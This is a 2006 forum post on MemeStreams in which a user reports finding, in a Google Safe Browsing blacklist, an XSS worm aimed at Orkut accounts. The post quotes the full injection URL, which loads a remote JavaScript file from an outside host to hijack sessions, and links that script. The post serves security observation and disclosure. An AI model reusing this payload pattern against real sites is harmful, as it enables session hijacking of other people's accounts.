Create an Account
username: password:
 
  MemeStreams Logo

MemeStreams Discussion

search


This page contains all of the posts and discussion on MemeStreams referencing the following web page: XSS worm source code for hijacking Orkut accounts. You can find discussions on MemeStreams as you surf the web, even if you aren't a MemeStreams member, using the Threads Bookmarklet.

XSS worm source code for hijacking Orkut accounts
by Acidus at 4:17 pm EST, Dec 9, 2006

I was running through some proxy logs, and saw a reference to http://sb.google.com/safebrowsing/update?version=goog-black-url:1:-1.

Requesting it redirected me to a blacklist of what look like phishing sites. However, all the way at the bottom was a reference to Google's Orkut site. Specifically the blacklist entry was for a GET-based XSS attack against Google's GLogin system.

https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.js\'></script><!--

If you request that URL, you get a 403 error page saying your query is from an automated attack. Looks very similar to a page Google returned during the Perl.Santy attack a year or so back.

The JavaScript source code to the attack is still available at http://www.probranco.net/xmen.js

It appears that the worm is for hijacking Orkut sessions. Here is an interesting thread when it appear the worm's code was refined.


 
 
Powered By Industrial Memetics